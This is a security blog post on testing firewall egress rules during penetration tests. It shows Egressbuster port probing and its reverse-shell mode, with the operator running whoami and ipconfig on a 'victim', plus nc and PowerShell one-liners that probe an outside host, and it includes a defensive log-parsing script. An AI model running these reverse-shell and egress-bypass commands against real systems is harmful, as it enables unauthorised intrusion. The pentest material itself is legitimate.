
Firewall egress rule testing

March 31, 2018 • Security

A few notes on testing firewall egress (outbound) rules during a penetration test.

Metasploit

The reverse_tcp_allports payload is not covered in detail here; see:

https://blog.rapid7.com/2009/09/24/forcing-payloads-through-restrictive-firewalls/

Two other tools are introduced below.

Egressbuster

The first is Egressbuster: https://github.com/trustedsec/egressbuster

egressbuster probes outbound ports; it ships both as a Python script and as a packaged EXE, which is very convenient. egress_listener.py runs on the external host, receives the connection attempts, and listens for the reverse shell.

Usage:

The simplest form:

python egressbuster.py 183.xx.xx.xx 1-65535
[i] Sending packets to egress listener (138.xx.xx.xx)...
[i] Starting at: 1/tcp, ending at: 65535/tcp
[*] Connection made to 183.xx.xx.xx on port: 22/tcp
[*] Connection made to 183.xx.xx.xx on port: 80/tcp
[*] Connection made to 183.xx.xx.xx on port: 443/tcp
[v] Trying: TCP 1000
[v] Trying: TCP 2000

... <snip> ...

[v] Trying: TCP 31000
[*] Connection made to 183.xx.xx.xx on port: 31337/tcp
[*] Connection made to 183.xx.xx.xx on port: 31338/tcp
[*] Connection made to 183.xx.xx.xx on port: 31339/tcp
[v] Trying: TCP 32000
[v] Trying: TCP 33000

... <snip> ...

[v] Trying: TCP 65000
[*] All packets have been sent
[i] Remaining threads: 301
[i] Remaining threads: 102
[i] Remaining threads: 3

... <snip> ...

python egress_listener.py 183.xx.xx.xx eth0 172.xx.xx.xx
[*] Inserting iptables rule to redirect connections from 172.xx.xx.xx to **all TCP ports** to Egress Buster port 1090/tcp
[*] Listening on all TCP ports now... Press control-c when finished.
[*] Connected from 172.xx.xx.xx on port: 22/tcp
[*] Connected from 172.xx.xx.xx on port: 80/tcp
[*] Connected from 172.xx.xx.xx on port: 443/tcp
[*] Connected from 172.xx.xx.xx on port: 31338/tcp
[*] Connected from 172.xx.xx.xx on port: 31337/tcp
[*] Connected from 172.xx.xx.xx on port: 31339/tcp
^C
[*] Exiting and removing iptables redirect rule.
[*] Done

Reverse shell

python egressbuster.py 183.xx.xx.xx 1-50 shell
[i] Sending packets to egress listener (138.xx.xx.xx)...
[i] Starting at: 1/tcp, ending at: 50/tcp
[*] Connection made to 183.xx.xx.xx on port: 22/tcp
[*] All packets have been sent
[i] Remaining threads: 50
[i] Remaining threads: 50
[i] Remaining threads: 1
[i] Remaining threads: 1
[*] Done

python egress_listener.py 183.xx.xx.xx eth0 172.xx.xx.xx shell
[*] Inserting iptables rule to redirect connections from 172.xx.xx.xx to **all TCP ports** to Egress Buster port 1090/tcp
[*] Listening on all TCP ports now... Press control-c when finished.
[*] Connected from 172.xx.xx.xx on port: 22/tcp
Enter the command to send to the victim:
Enter the command to send to the victim: whoami
megatron\ray
Enter the command to send to the victim: ipconfig
Windows IP Configuration


Ethernet adapter Ethernet 2:

   Connection-specific DNS Suffix  . : xxx
   IPv4 Address. . . . . . . . . . . : 192.168.5.xx
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.5.1

Tunnel adapter isatap.
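The listener output above is only useful once it is compared with what the firewall policy is supposed to allow. The following added example (not part of the original post or of Egressbuster) parses the "[*] Connected from ... on port: N/tcp" and "[*] Connection made to ... on port: N/tcp" lines from either side of a run and reports every reachable port that a hypothetical web-only egress policy does not permit; the sample log is constructed from the listener output shown in this section.

```python
import re
from typing import Dict, List, Set

# Matches a successful-connection line from either side of an Egressbuster run:
#   client:   "[*] Connection made to 183.xx.xx.xx on port: 22/tcp"
#   listener: "[*] Connected from 172.xx.xx.xx on port: 31337/tcp"
# Progress lines ("[v] Trying: ...", "[i] Remaining threads: ...") never match.
_HIT_RE = re.compile(
    r"^\[\*\] Connect(?:ion made to|ed from) \S+ on port: "
    r"(?P<port>\d+)/(?P<proto>tcp|udp)$"
)

# Constructed sample: the egress_listener.py output shown earlier in this section.
SAMPLE_LISTENER_LOG = """\
[*] Listening on all TCP ports now... Press control-c when finished.
[*] Connected from 172.xx.xx.xx on port: 22/tcp
[*] Connected from 172.xx.xx.xx on port: 80/tcp
[*] Connected from 172.xx.xx.xx on port: 443/tcp
[*] Connected from 172.xx.xx.xx on port: 31338/tcp
[*] Connected from 172.xx.xx.xx on port: 31337/tcp
[*] Connected from 172.xx.xx.xx on port: 31339/tcp
"""

# Hypothetical egress policy for the tested segment: only web traffic may leave.
WEB_ONLY_POLICY: Dict[str, Set[int]] = {"tcp": {80, 443}}


def parse_egress_hits(log_text: str) -> Dict[str, Set[int]]:
    """Collect the ports that reached the listener, grouped by protocol."""
    hits: Dict[str, Set[int]] = {}
    for line in log_text.splitlines():
        m = _HIT_RE.match(line.strip())
        if m and 0 < int(m.group("port")) < 65536:  # skip noise and bad ports
            hits.setdefault(m.group("proto"), set()).add(int(m.group("port")))
    return hits


def unexpected_egress(hits: Dict[str, Set[int]],
                      policy: Dict[str, Set[int]]) -> Dict[str, List[int]]:
    """Ports seen leaving the network that the policy does not allow."""
    gaps: Dict[str, List[int]] = {}
    for proto, ports in hits.items():
        extra = ports - policy.get(proto, set())
        if extra:
            gaps[proto] = sorted(extra)
    return gaps


if __name__ == "__main__":
    found = unexpected_egress(parse_egress_hits(SAMPLE_LISTENER_LOG), WEB_ONLY_POLICY)
    for proto, ports in found.items():
        print(f"{proto}: reachable outbound but not in policy: {ports}")
```

Each port listed by the script is a rule the firewall change process should either document or close; the non-web ports from the sample run (22 and the 3133x range) are exactly the ones a reverse shell would use.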

letmeoutofyour

Another option is the site created by mubix for testing egress rules: www.letmeoutofyour.net

Usage:

Windows

PowerShell:

$ErrorActionPreference = "silentlycontinue"; 1..1024 | % {$req = [System.Net.WebRequest]::Create("http://letmeoutofyour.net:$_"); $req.Timeout = 600; $resp = $req.GetResponse(); $respstream = $resp.GetResponseStream();
$stream = new-object System.IO.StreamReader $respstream; $out = $stream.ReadToEnd(); if ($out.trim() -eq "w00tw00t"){echo "$_ Allowed out"}}

Cmd:

for /L %i in (1,1,1024) do @nc.exe -z -v letmeoutofyour.net %i | findstr "w00tw00t"

Linux

Bash (using netcat): for ((i=1; i<1024; i++)) do nc -z -v letmeoutofyour.net $i | grep "w00tw00t"; done

Python:

https://gist.github.com/re4lity/1ef33901255aec093e1e71d3193c2e82
